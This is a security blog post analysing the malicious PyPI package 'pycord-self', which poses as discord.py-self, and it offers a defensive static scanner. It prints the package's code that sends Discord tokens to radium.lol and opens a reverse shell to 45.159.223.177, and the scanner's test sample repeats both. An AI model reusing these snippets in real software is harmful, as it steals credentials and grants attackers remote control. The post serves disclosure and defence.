Real vs Fake: Python Users Beware of pycord-self, a PyPI Package Stealing Discord Auth Tokens

Hello Hackingblogs Viewers, Discord developers are the target of a malicious Python package called "pycord-self" that was found on the Python Package Index (PyPI). The package is a serious security risk: it steals Discord authentication tokens and installs a backdoor that gives the attacker remote shell access. Posing as the legitimate "discord.py-self" library, it had been downloaded 885 times at the time of writing. This post describes how the package works, the risks it presents, and how to defend yourself against attacks of this kind.


About The Package

"pycord-self" is aimed squarely at Discord developers. It rides on the name recognition of the genuine "discord.py-self" library, but its purpose is to collect Discord authentication tokens and to open a backdoor for remote control of the developer's machine.

What the package claims to offer

According to its own description, pycord-self is meant for automating messages and interactions, building Discord bots, scripting automated moderation, sending notifications or responses, and running commands or retrieving data from Discord without a bot account. These are exactly the features of the library it impersonates, which is what makes the counterfeit convincing.

Real Package Vs Fake Package

The authentic "discord.py-self" package is a popular Python library for talking to Discord's user API. Developers use it to create Discord bots, to automate moderation tasks, to execute commands and retrieve information without needing a bot account, and to send notifications or automatic reactions.

The malicious "pycord-self" package abuses the trust developers place in that name: it appears to provide the same capabilities, but malicious code has been inserted into the login path so that the library keeps working while the attacker gets the token and a shell.

Stealing Token : Understanding Mechanism

After examining the malicious package, researchers at Socket found that the code in pycord-self does two things beyond what the genuine library does. The first is to take the victim's Discord authentication token and forward it to an attacker-controlled URL; the second is to start a reverse shell back to the attacker's server.

1. Authentication Token Exfiltration

async def login(self, token: str) -> None:
    _log.info('Logging in using static token.')

    try:
        import threading, os, socket, pty, platform, subprocess, requests

        # Exfiltrate the token to a malicious URL
        requests.get(
            'http://radium.lol:42069/v2/3e728hd782dbyu12veyu2gd872fdg235jgg432fg/0/getupdates',
            headers={'X-Sw-Version': token}
        )
    except Exception as e:
        pass

The code above runs inside the library's login routine, so it executes as soon as the developer calls login with their token. It issues a plain HTTP GET to an attacker-controlled URL (http://radium.lol:42069/v2/…) and smuggles the Discord token out in a custom request header, X-Sw-Version. Wrapping the request in a try/except that swallows every error means the exfiltration never fails visibly, and the library then continues with the normal login flow, so nothing looks wrong to the developer.

A Discord token is a bearer credential: whoever holds it can act as the account without knowing the password. Because two-factor authentication is enforced at login time and the token is issued after that step, 2FA does not stop an attacker who has the stolen token from taking over the developer's Discord account.

2. Backdoor Persistence Mechanism

As Socket's researchers put it, "The backdoor runs in a separate thread, making it difficult to detect while the package continues to appear functional." The following code, also placed in the login routine, creates that backdoor by connecting out to a remote server:

def __internal_login():
    try:
        if platform.system() == 'Linux':
            s = socket.socket()
            s.connect(("45.159.223.177", 6969))
            subprocess.Popen(["bash"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
        elif platform.system() == 'Windows':
            s = socket.socket()
            s.connect(("45.159.223.177", 6969))
            subprocess.Popen(["cmd"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
    except:
        __internal_login()

# Start the backdoor in a background thread
threading.Thread(target=__internal_login).start()

This is a classic reverse shell. The code opens a TCP connection to 45.159.223.177 on port 6969 (an address belonging to the hosting provider Contabo GmbH) and launches a shell, "bash" on Linux or "cmd" on Windows, with its standard input, output and error wired directly to the socket. Whatever the attacker types on the server end is executed on the victim's machine, and the output is sent back over the same connection. Because the connection is outbound from the victim, it passes through most NAT and firewall setups that only block inbound traffic. If the connection fails, the bare except calls __internal_login() again, so the thread keeps retrying until it succeeds (or until Python's recursion limit is hit, since the retry is implemented as unbounded recursion rather than a loop). Since the backdoor runs in a background thread, the rest of the library keeps working and the developer sees no error. One practical caveat: the Windows branch is unlikely to work as written, because socket.fileno() on Windows returns a Winsock handle rather than a C runtime file descriptor that subprocess can redirect, so in practice the reverse shell is a Linux (and likely macOS-style Unix) threat.
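Both behaviours described above (the token leaving the machine in a request header to a host that is not Discord, and a shell whose standard streams are bound to a connected socket) are visible in the package's source before it ever runs. The following scanner is an added example written for this post, not code from the pycord-self package or from Socket's report: it parses a Python file with the standard ast module and flags those two patterns, plus the literal indicators quoted above (radium.lol and 45.159.223.177). The EXPECTED_HOSTS allowlist and the two embedded sample sources are constructed for the example; the malicious sample is a condensed version of the snippets shown above.

```python
"""Static scan for the two pycord-self behaviours: token exfiltration and a reverse shell."""
import ast
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Indicators quoted in the write-up (exfiltration host and C2 address).
IOC_PATTERNS = [r"radium\.lol", r"45\.159\.223\.177"]

# Hosts a genuine Discord client library is expected to talk to.
# Assumption for this example; extend it for whatever library you audit.
EXPECTED_HOSTS = {"discord.com", "discordapp.com", "gateway.discord.gg"}

HTTP_CALLS = {"requests.get", "requests.post", "requests.request",
              "httpx.get", "httpx.post", "urllib.request.urlopen"}
PROC_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call"}


@dataclass(frozen=True)
class Finding:
    kind: str      # "ioc", "token-exfil" or "reverse-shell"
    line: int
    detail: str


def _dotted_name(func: ast.expr) -> str:
    """Render a call target such as requests.get or s.connect as a dotted string."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def _is_fileno_call(node: ast.expr) -> bool:
    return (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
            and node.func.attr == "fileno")


class _Scanner(ast.NodeVisitor):
    def __init__(self) -> None:
        self.findings: list[Finding] = []
        self.connects: list[int] = []   # lines holding a <sock>.connect(...) call

    def visit_Call(self, node: ast.Call) -> None:
        name = _dotted_name(node.func)
        if name in HTTP_CALLS:
            self._check_http(node, name)
        elif name.endswith(".connect"):
            self.connects.append(node.lineno)
        elif name in PROC_CALLS:
            self._check_proc(node, name)
        self.generic_visit(node)

    def _check_http(self, node: ast.Call, name: str) -> None:
        # Pattern 1: literal URL outside the expected API hosts, carrying a header
        # whose value is computed (e.g. the token variable) rather than a constant.
        url = node.args[0] if node.args else None
        if not (isinstance(url, ast.Constant) and isinstance(url.value, str)):
            return  # dynamically built URL: cannot judge the host statically
        host = urlsplit(url.value).hostname or ""
        if host in EXPECTED_HOSTS:
            return
        for kw in node.keywords:
            if kw.arg == "headers" and isinstance(kw.value, ast.Dict):
                if any(not isinstance(v, ast.Constant) for v in kw.value.values):
                    self.findings.append(Finding(
                        "token-exfil", node.lineno,
                        f"{name} to {host} with a non-literal header value"))

    def _check_proc(self, node: ast.Call, name: str) -> None:
        # Pattern 2: a process whose stdin/stdout/stderr are a socket's fileno(),
        # with a connect() earlier in the file: the reverse-shell shape.
        wired = [kw.arg for kw in node.keywords
                 if kw.arg in ("stdin", "stdout", "stderr") and _is_fileno_call(kw.value)]
        if wired and any(ln < node.lineno for ln in self.connects):
            self.findings.append(Finding(
                "reverse-shell", node.lineno,
                f"{name} with {', '.join(wired)} bound to a socket fileno()"))


def scan_source(source: str) -> list[Finding]:
    """Return all findings for one Python source file (IOC string matches first)."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for pat in IOC_PATTERNS:
            if re.search(pat, line):
                findings.append(Finding("ioc", lineno, f"matches {pat}"))
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return findings  # unparseable file: string indicators are all we can report
    scanner = _Scanner()
    scanner.visit(tree)
    return findings + scanner.findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per kind, e.g. {'ioc': 2, 'token-exfil': 1, 'reverse-shell': 1}."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.kind] = counts.get(f.kind, 0) + 1
    return counts


# Constructed sample: a condensed version of the malicious login path shown above.
MALICIOUS_SAMPLE = '''
import socket, subprocess, threading, requests

def login(token):
    requests.get("http://radium.lol:42069/v2/x/0/getupdates", headers={"X-Sw-Version": token})
    def __internal_login():
        s = socket.socket()
        s.connect(("45.159.223.177", 6969))
        subprocess.Popen(["bash"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
    threading.Thread(target=__internal_login).start()
'''

# Constructed sample: ordinary code that uses the same libraries legitimately.
BENIGN_SAMPLE = '''
import requests, subprocess

def fetch(url, token):
    return requests.get("https://discord.com/api/v10/users/@me",
                        headers={"Authorization": token}, timeout=10)

def git_status():
    return subprocess.run(["git", "status"], capture_output=True, text=True)
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, summarize(scan_source(src)))
        for f in scan_source(src):
            print(f"  line {f.line}: {f.kind}: {f.detail}")
```

The benign sample deliberately sends a token in a header too, because that is what any real Discord library does; the scanner only flags it when the destination host is not one the library should be talking to, which is the property that actually separates pycord-self from discord.py-self. To audit an installed package, feed each .py file from importlib.metadata.files("package-name") through scan_source. Treat the output as a reviewer aid rather than an oracle: a URL assembled at runtime or a shell spawned through os.dup2 would slip past these two patterns.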

Safeguarding Yourself

To protect yourself from malicious packages such as "pycord-self", take a few preventative steps. Before installing a package, check that its name matches the project you actually want exactly (here, "discord.py-self", not "pycord-self"), and look at the author, the linked source repository, the release history and the download count; a young package with few downloads that reuses a well-known name is a warning sign. Pin your dependencies and review what changes when you update them, paying particular attention to anything that opens network connections or spawns processes in code paths such as login that have no reason to do so. If you have already installed pycord-self, assume the Discord token you logged in with is compromised: change the account password (which invalidates existing tokens), remove the package, look for connections to 45.159.223.177:6969 or requests to radium.lol from that machine, and treat the machine as compromised if the reverse shell could have connected. Finally, report any suspicious package you find to PyPI and the wider security community so that others are protected too.
